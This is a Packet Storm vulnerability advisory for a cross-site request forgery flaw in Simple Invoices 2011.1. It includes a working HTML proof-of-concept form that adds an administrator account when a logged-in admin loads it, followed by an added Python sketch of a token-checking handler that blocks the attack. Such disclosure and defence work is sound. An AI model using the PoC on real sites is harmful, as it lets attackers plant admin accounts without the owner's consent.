Simple Invoice 2011.1 Cross Site Request Forgery

2015-05-20T00:00:00
ID PACKETSTORM:131989
Type packetstorm
Reporter Provensec
Modified 2015-05-20T00:00:00

Description

                                        
                                            `# Affected software: simple invoice  
# Type of vulnerability:adding admin user via csrf  
# URL:simpleinvoices.org  
# Discovered by: provensec  
# Website: provensec.com  
  
#version:2011.1  
# Proof of concept  
  
<html>  
  
<body>  
<form action="  
http://demo.simpleinvoices.org/index.php?module=user&view=add"  
method="POST">  
<input type="hidden" name="email" value="aaaa@gmail.com" />  
<input type="hidden" name="role" value="1" />  
<input type="hidden" name="password_field" value="lalala123@"  
/>  
<input type="hidden" name="enabled" value="1" />  
<input type="hidden" name="submit" value="Insert User" />  
<input type="hidden" name="op" value="insert_user" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
`
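Added example, not part of the advisory or of the Simple Invoices code base: a model of the `insert_user` handler that rejects the request above because it carries no session-bound CSRF token and arrives from a foreign origin. `SERVER_KEY`, `csrf_token`, `same_origin`, `insert_user` and the session id are assumptions; the real application is PHP and is not reproduced here.

```python
import hmac
import hashlib
import secrets
from urllib.parse import urlparse

# Hypothetical server-side secret; a real deployment keeps it outside the code.
SERVER_KEY = secrets.token_bytes(32)
# Host from the advisory's PoC, used as the only origin allowed to POST here.
ALLOWED_ORIGIN = "http://demo.simpleinvoices.org"


def csrf_token(session_id: str) -> str:
    """Synchronizer token bound to the session: HMAC-SHA256(server_key, session_id)."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def same_origin(headers: dict) -> bool:
    """Defence in depth: a POST whose Origin/Referer is not our site is cross-site."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False  # no provenance header at all: treat as cross-site
    u = urlparse(src)
    return f"{u.scheme}://{u.netloc}" == ALLOWED_ORIGIN


def insert_user(session_id: str, headers: dict, form: dict) -> tuple:
    """Hardened handler for module=user&view=add with op=insert_user.

    Returns (accepted, reason). The session cookie alone is never enough:
    the request must also carry the token only the real admin page can know.
    """
    if form.get("op") != "insert_user":
        return False, "unknown op"
    if not same_origin(headers):
        return False, "cross-site request rejected (Origin/Referer)"
    supplied = form.get("csrf_token", "")
    expected = csrf_token(session_id)
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return False, "missing or invalid CSRF token"
    # Only reached for a request the admin's own page actually issued.
    return True, f"user {form['email']} inserted with role {form['role']}"


# Constructed input: the fields exactly as the PoC form submits them (no token).
POC_FORM = {"email": "aaaa@gmail.com", "role": "1", "password_field": "lalala123@",
            "enabled": "1", "submit": "Insert User", "op": "insert_user"}
```

A legitimate admin page embeds `csrf_token(session_id)` as a hidden field, so the same fields plus that token are accepted while the PoC's token-less POST is refused even when the Origin check is bypassed.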